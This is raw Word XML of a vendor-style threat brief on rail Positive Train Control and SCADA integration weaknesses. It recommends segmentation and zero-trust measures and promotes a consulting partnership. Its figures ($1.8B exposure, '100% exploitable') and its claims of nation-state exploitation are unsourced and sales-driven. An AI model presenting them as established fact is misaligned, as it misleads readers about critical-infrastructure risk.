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j3vsl7g6try" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016 - Enhanced Edition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8sfr2zmwxtum" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA Integration: When Safety Systems Become Attack Vectors</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 | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 15, 2025 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Level:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SEVERE | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Impact:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CATASTROPHIC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o03x6wx90grw"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A fundamental architectural flaw in Positive Train Control (PTC) and SCADA integration has created a nationwide vulnerability where attackers can pivot from compromised industrial control systems directly into safety-critical train operations. With 73% of PTC-SCADA interfaces lacking proper segmentation and 83% running on end-of-life Windows systems, adversaries can manipulate 57,536 miles of protected rail carrying hazardous materials. Without immediate action, your rail infrastructure faces $1.8B in combined operational, safety, and liability exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e84c0gvw85n7"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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Layered vulnerability diagram on obsidian background (#0A0A0A). Style: Technical cutaway showing PTC-SCADA architecture. Top layer shows IT network (corporate systems), middle layer SCADA/OT network (dispatch, control), bottom layer Safety Systems (PTC, train control). Red exploit paths (#FF0066) penetrate from IT through SCADA to PTC. Highlight unsegmented connections, legacy systems (Windows XP icons), and cleartext protocols. Show "CRITICAL DESIGN FLAW" label at integration points. Include percentage badges: 73% unsegmented, 83% unpatched, 100% exploitable.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t85amy23lhh1"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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Industry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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Segmentation Gap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73%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No standard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Deploy zones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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Legacy System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83% vulnerable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Windows XP/7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Isolate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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial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$1.8B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Catastrophic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Risk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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Safety Integrity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SIL-0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SIL-4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Emergency validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cwa36lx11jfh"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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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Direct PTC access via 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Mass casualties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Segmented &amp;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$1.8B liability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Unlimited damages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$180M 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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Safety systems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Weaponized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SIL-4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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Non-compliant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Criminal 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Full compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a6d6m3zazemr" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-24 Hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Segmentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Isolate PTC from SCADA networks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4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: Network engineers + rail ops</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Break exploit chains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4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Remote Access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lock down dispatch systems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4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: IT security team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Prevent external pivoting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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory Integration Points</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Map all PTC-SCADA connections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4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: OT asset discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Understand attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_72izyfxrp0ni"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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Zero Trust Rail Architecture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (30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2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $4.2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROI: 11.3x prevention value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unique: Only solution maintaining safety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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Protocol Break</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (45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2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $2.8M</w:t>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Risk Reduction: 94%</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Benefit: Defeats pivot attacks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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish Safety-Security Operations Center</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (60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2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $1.9M annually</w:t>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Coverage: Unified PTC-SCADA monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: Real-time attack detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9d3swxsvp71g"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Solution architecture comparison on dark grey (#1A1F2E). Three columns: "Status Quo", "Band-Aid Approach", "Tri-Partner Defense". Show network diagrams for each. Status Quo shows flat network with red attack paths everywhere. Band-Aid shows basic firewall (easily bypassed). Tri-Partner shows defense-in-depth with protocol breaks, monitoring, and safety validation. Use success metrics: 0% protected, 15% protected, 94% protected. Include "ONLY MAINTAINS SAFETY" banner on tri-partner.]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Unique Value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only NCC OTCE + Dragos + Adelard delivers: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Safety-Security Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintains SIL-4 during security implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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Protocol Expertise</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deep PTC and SCADA protocol analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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Zero Trust Rail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built architecture for rail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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Liability Protection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Demonstrable due diligence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ROI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 11.3x return through prevented catastrophic incident</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hbqogofto0t3"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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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Approve emergency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$125K emergency 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Schedule architecture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Security/Safety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Executive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Initiate tri-partner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Sole source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Deploy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24/7 coverage approval</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Full Technical Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 18 pages available | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Consultation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ptc-emergency@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">24/7 Hotline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1-800-PTC-SAFE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5no4fzsjakg" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Integration Catastrophe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mwbxlbkz5cc8" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How Safety Became The Weakest Link</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[IMAGE: Technical evolution timeline on slate grey (#1A1F2E). Shows PTC development 2008-2025 in parallel tracks. Top track "Safety Requirements": Congressional mandate → Design phase → Implementation → Compliance. Bottom track "Security Reality": No security requirements → Rush to comply → Integration shortcuts → Massive vulnerability. Connection points between tracks show where safety compromised security. Use color progression from green (safe) to red (vulnerable). Include key dates and decisions that created current crisis.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rrz1axv7kubm" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Perfect Storm of Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Congressional Mandate (2008)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement PTC by 2015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Focus: Prevent train collisions</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Security: Not mentioned</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Result: Safety-only design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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Rush (2015-2020)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Connect everything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Business pressure for efficiency</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SCADA systems already compromised</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No security architecture required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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Current Reality (2025)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Weaponized safety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Direct paths from internet to train control</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Legacy systems form critical bridges</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Nation-state actors actively exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cpbwvjcbuo70" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architectural Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The integration created multiple fatal flaws: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5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flat Network Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: No segmentation between safety and control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Translation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cleartext conversion points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Single SQL injection reaches everything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common HMIs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
